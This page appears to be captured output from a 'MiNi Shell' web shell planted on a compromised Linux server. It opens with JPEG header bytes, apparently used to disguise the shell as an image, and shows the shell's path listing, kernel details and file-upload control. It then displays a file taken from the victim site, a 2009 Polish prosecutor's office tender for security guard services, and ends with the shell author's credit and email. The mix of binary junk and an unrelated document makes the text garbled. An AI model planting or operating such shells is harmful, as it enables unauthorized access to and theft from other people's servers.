JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090109/10749-N-2009.html

<p class="kh_header"><b>Olsztyn: Świadczenie usług w zakresie ochrony osób i mienia oraz posesji
Prokuratury Okręgowej w Olsztynie oraz Prokuratur Rejonowych w Olecku,
Olsztyn Południe i Olsztyn Północ</b><br>
<b>Numer ogłoszenia: 10749 - 2009; data zamieszczenia: 09.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prokuratura Okręgowa w Olsztynie , ul. Dąbrowszczaków 12, 10-959 Olsztyn, woj. warmińsko-mazurskie, tel. (089) 52 15 457, faks (089) 52 15 401.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie ochrony osób i mienia oraz posesji
Prokuratury Okręgowej w Olsztynie oraz Prokuratur Rejonowych w Olecku,
Olsztyn Południe i Olsztyn Północ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest całodobowa ochrona fizyczna osób i mienia oraz posesji, przez koncesjonowanego Wykonawcę w oparciu o postanowienia Ustawy z dnia 22.08.1997r. o ochronie osób i mienia (Dz. U. z 2005r. Nr 145 poz. 1221 z późn. zm.), następujących jednostek:
-	Prokuratura Okręgowa w Olsztynie - ul. Dąbrowszczaków 12, 10-959 Olsztyn,
-	Prokuratura Rejonowa Olsztyn Północ - ul. Emilii Plater 12, 10-959 Olsztyn,
-	Prokuratura Rejonowa Olsztyn Południe - ul. Kopernika 5, 10-959 Olsztyn,
-	Prokuratura Rejonowa w Olecku - ul. Sembrzyckiego 18, 19-400 Olecko, (w budynku Prokuratury na parterze i I piętrze pomieszczenia biurowe zostały użyczone Sądowi Rejonowemu w Olecku)

We wszystkich czterech jednostkach musi być całodobowy posterunek stały w systemie zmianowym (3-osobowym) przez cały okres obowiązywania umowy. 

Ochrona fizyczna osób i mienia oraz terenu poszczególnych jednostek, a także przeciwdziałanie potencjalnym zagrożeniom realizowane będą zgodnie z opracowanymi przez Wykonawcę planami ochrony dla poszczególnych obiektów, które muszą być sprawdzone przez Dyrektora Wydziału III i Pełnomocnika ds. Ochrony Informacji Niejawnych (pracownicy Prokuratury Okręgowej w Olsztynie), poprzez:
-	utrzymanie całodobowych posterunków stałych w systemie zmianowym (min. 3 osobowym) przez cały okres obowiązywania umowy;
-	okresowe patrolowanie stref oraz rejonów wymagających szczególnej ochrony, wewnątrz i na zewnątrz obiektów;
-	dozorowanie sygnałów przekazywanych przez system elektronicznej kontroli dostępu, telewizji przemysłowej, systemu ochrony p.poż. itp.;
Wszystkie sprawdzone Plany ochrony dla poszczególnych jednostek Wykonawca przedłoży Zamawiającemu w okresie do 1 miesięcy licząc od daty podpisania umowy.

Całodobowa ochrona fizyczna osób i mienia oraz posesji powyższych jednostek polegać będzie między innymi na:
-	natychmiastowym reagowaniu na wszelkie (również telefoniczne) zgłoszenia zagrożenia osób lub obiektu;
-	zapewnieniu bezpieczeństwa pracownikom oraz interesantom i gościom Prokuratury;
-	ochronie siedziby poszczególnych jednostek przed napadem, włamaniem, penetracją osób niepożądanych, kradzieżą, atakami wandalizmu, terroryzmu itp.;
-	w przypadku jakichkolwiek zagrożeń niezwłoczne powiadamianiu upoważnionego pracownika Zamawiającego, Policji, Straży Pożarnej i innych służb oraz współdziałanie z ww. w celu zapewnienia prawidłowej ochrony;
-	zapewnieniu wsparcia grupy interwencyjnej w przypadku działań wymagających wzmocnienia ochrony stacjonarnej w czasie nie dłuższym niż 10 minut od zgłoszenia;
-	w przypadku występowania w danym obiekcie, obsłudze urządzeń systemu włamania i napadu, kontroli dostępu, p.poż oraz telewizji przemysłowej;

Główne obowiązki Wykonawcy w zakresie realizacji niniejszego zamówienia: 
-	skierowanie stałych min. 3 osobowych zespołów pracowników ochrony przewidzianych do realizacji zamówienia posiadających licencje pracownika ochrony fizycznej I lub II stopnia oraz poświadczenie bezpieczeństwa o klauzuli min. (poufne) do każdego obiektu wskazanego powyżej z zastrzeżeniem § 2 pkt 11 i 12 projektu umowy - Załącznik nr 6,
-	planowanie zadań dla podległych pracowników ochrony;
-	sprawowanie nadzoru i kontroli nad realizacją zadań służby ochrony;
-	zadbanie o to aby personel ochrony w czasie pracy w poszczególnych jednostkach był wyposażony w jednolity ubiór tj. mundur, garnitur itp., elementy identyfikujące firmę;
-	wyposażenie pracowników w niezbędny sprzęt przymusu bezpośredniego oraz środki łączności z centralą;
-	dbałość o dyscyplinę pracy i schludny wygląd zewnętrzny podległych pracowników ochrony;
-	okresowe kontrolowanie telefoniczne gotowości posterunku poprzez całodobowe centrum monitorowania w godzinach od 2200 do 600;
-	okresowe kontrolowanie przez patrol/załogę interwencyjną w godzinach pomiędzy 2200 a 600, z wpisem osób kontrolujących do książki dyżuru. Wskazane jest aby przedmiotowe kontrole przeprowadzać raz na dwa tygodnie;
-	zapewnienie co najmniej dwóch grup interwencyjnych, jedną na terenie miasta Olsztyn i jedną na terenie miasta Olecko w składzie co najmniej dwuosobowym (pracownicy ochrony posiadający licencje pracownika ochrony fizycznej co najmniej I stopnia), zdolną dotrzeć do poszczególnych lokalizacji określonych powyżej w czasie 10 min od momentu zgłoszenia konieczności podjęcia interwencji;

Główne obowiązki pracownika ochrony:
-	niedopuszczenie do wejścia na teren chronionego obiektu osób nieuprawnionych i będących pod wpływem alkoholu lub środków odurzających;
-	informowanie interesantów odnośnie osoby i miejsca załatwienia spraw i ich pokierowanie; 
-	podejmowanie niezbędnych interwencji w przypadku stwierdzenia naruszenia zasad bezpieczeństwa ochranianych osób i mienia;
-	przeciwdziałanie zaistnieniu potencjalnych zagrożeń zewnętrznych i wewnętrznych;
-	sprawne działanie w przypadku zaistnienia sytuacji kryzysowych;
-	kontroli ruchu osobowo-materiałowego wewnątrz i na zewnątrz obiektów oraz podejmowaniu działań w przypadku jego naruszenia w tym obsługi stacjonarnego detektora metalu (bramki);
-	wydawanie i przyjmowanie kluczy do pomieszczeń służbowych oraz ich ochrona;
-	nadzór nad prawidłowym wykorzystaniem miejsc parkingowych przed poszczególnymi jednostkami;
-	sprawdzanie stanu bezpieczeństwa obiektu i pomieszczeń pod kątem nienaruszalności zamknięć i plomb;
-	czytelne prowadzenie dokumentacji służby ochrony:
-	prowadzenie książki dyżuru,
-	prowadzenie książki ewidencji wydawanych kluczy i pojemników,
-	prowadzenie ksiązki ewidencji wejść interesantów, 
-	przestrzeganie dyscypliny pracy oraz właściwej prezencji;
-	egzekwowanie od osób przebywających na terenie obiektów przepisów porządkowych p.poż. itp.
-	obchód obiektów i sprawdzanie czy po godzinach pracy oraz w dni wolne od pracy:
-	pozamykane są okna,
-	zakręcone kurki od wody,
-	pogaszone są światła,
-	na terenie poszczególnych jednostek nie przebywają osoby, które nie mają do tego uprawnień,
-	zamykanie i otwieranie drzwi wejściowych, bram wjazdowych, szlabanów itp.; 
-	w przypadku występowania w danej jednostce uzbrajanie i rozbrajanie systemu napadu i włamania w ustalonych godzinach;
-	reagowanie na zgłoszenia elektronicznych systemów sygnalizacyjnych i wizualizacji (w szczególności p.poż) oraz na zauważone zdarzenia mogące mieć wpływ na wystąpienie strat w mieniu (zalanie pomieszczeń, uszkodzenia oświetlenia, uszkodzenia zamków, drzwi, samozamykaczy, przecieki itp.). Sposób reagowania zostanie określony w Planie Ochrony Obiektu;
-	kontroli Ręcznych Ostrzegaczy Pożarowych oraz kontrola wszystkich nieuzasadnionych użyć powyższych urządzeń (do ujawnienia personaliów osoby dokonującej nieuzasadnionego użycia włącznie);.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zgodnie z art. 45 ustawy Zamawiający nie wymaga wniesienia wadium w niniejszym postępowaniu.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienie mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:

1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2.	Posiadają niezbędną wiedzę i doświadczenie, dysponują potencjałem technicznym, oraz osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24. ustawy.
5.	Spełniają warunki określone w Specyfikacji Istotnych Warunków Zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 6.	WYKAZ WYMAGANYCH DOKUMENTÓW

W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawcy zobowiązani są dołączyć do przedkładanej oferty niżej wymienione oświadczenia i dokumenty. 

6.1.	Niezbędne załączniki, które należy dołączyć do oferty

1.	Podpisany formularz ofertowy sporządzony zgodnie ze wzorem - wzór formularza stanowi zał. Nr 1,

6.2.	Oświadczenia wymagane na podstawie ustawy Prawo zamówień publicznych

1.	Oświadczenie o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1 i 2 ustawy - zał. Nr 2,
2.	Oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy - zał. Nr 3,

6.3.	Wymagane dokumenty, które należy dołączyć do oferty

Poniższe dokumenty należy składać w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę.

Zamawiający może żądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kserokopia dokumentu jest nieczytelna lub budzi uzasadnione wątpliwości co do jej prawdziwości, a Zamawiający nie może sprawdzić jej prawdziwości w inny sposób.

6.3.1.	Wymagane dokumenty na podstawie Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. (Dz. U. z 2006r. Nr 87 poz. 605), które należy dołączyć do oferty w celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności

1.	Aktualna koncesja, wydana przez MSWiA zgodnie z ustawą o ochronie osób i mienia na prowadzenie działalności gospodarczej w zakresie ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz.U. z 2005 r. nr 145 poz. 1221 z późn. zm.),
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminy składania ofert,
3.	Aktualną informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
4.	Zaświadczenia właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenia zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

6.3.2.	Wymagane dokumenty, które należy dołączyć do oferty w celu potwierdzenia, że Wykonawca posiada niezbędną wiedze oraz doświadczenie, potencjał techniczny a także dysponuje osobami zdolnymi do wykonywania zamówienia

1.	Wykaz kadry, którą dysponuje Wykonawca, która przewidziana jest do wykonania przedmiotu zamówienia lub pisemne zobowiązanie innych podmiotów do udostępnienia odpowiedniej kadry, pracownicy ujęcie w niniejszym wykazie muszą posiadać uprawnienia niezbędne do wykonania przedmiotu zamówienia tj. aktualną licencję pracownika ochrony I lub II stopnia zgodnie z ustawą z dnia 22 sierpnia 1997r. o ochronie osób i mienia (Dz. U. z 2005r. Nr 145 poz. 1221 z późn. zm.), do oferty dołączyć kserokopie licencji. 

Wskazane jest aby każdy pracownik ochrony wyszczególniony w przedmiotowym wykazie posiadał również aktualne poświadczenie bezpieczeństwa upoważniające do dostępu do informacji stanowiących tajemnicę służbową o klauzuli poufne zgodnie z ustawą z dnia 22 stycznia 1999r. o ochronie informacji niejawnych (Dz. U. z 2005r. Nr 196, poz. 1631 z późn. zm.). W przypadku gdyby pracownicy ochrony wskazani w przedmiotowym wykazie przewidziani do wykonania przedmiotu zamówienia nie dysponowali przedmiotowymi poświadczeniami Zamawiający oświadcza, iż na pisemny wniosek Wykonawcy przeprowadzi odpowiednie procedury zmierzające do wydania przedmiotowego poświadczenia. Wykonawca w takim przypadku zobowiązany będzie bezpośrednio po podpisaniu umowy do wystąpienia na piśmie z prośbą do Zamawiającego o przeprowadzenie odpowiednich procedur. 

Na każdą Prokuraturę Wykonawca musi zapewnić co najmniej trzech pracowników, którzy na zmianę będą ochraniać poszczególne jednostki - zał. Nr 4

2.	Wykaz min. 2 usług o wartości nie mniejszej niż 200.000,00zł brutto każda, wykonanych w ciągu ostatnich 3 lat (a jeżeli okres prowadzenia działalności jest krótszy - za ten okres) o charakterze  podobnych do przedmiotu zamówienia oraz załączenie dokumentów potwierdzających, że usługi te zostały wykonane z należytą starannością - np. referencje - zał. Nr 5

3.	Podpisany projekt umowy - zał. Nr 6

4.	Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę ubezpieczenia w wysokości co najmniej 200 000 złotych.

6.4.	Oświadczenia wynikające z warunków określonych niniejszą specyfikacją

Oświadczenie, że Wykonawca dysponuje co najmniej dwoma grupami interwencyjnymi lub pisemne zobowiązanie innych podmiotów o udostępnieniu Wykonawcy takich grup, jedną na terenie miasta Olsztyn i jedną na terenie miasta Olecko w składzie co najmniej dwuosobowym (pracownicy ochrony posiadający licencje pracownika ochrony fizycznej co najmniej I stopnia), zdolną dotrzeć do poszczególnych lokalizacji określonych w pkt. 2 niniejszej SIWZ w czasie 10 min od momentu zgłoszenia konieczności podjęcia interwencji.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.olsztyn.po.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Prokuratura Okręgowa w Olsztynie
ul. Dąbrowszczaków 12
10-959 Olsztyn.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.01.2009 godzina 10:00, miejsce: Prokuratura Okręgowa w Olsztynie
ul. Dąbrowszczaków 12
10-959 Olsztyn
Biuro Podawcze.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com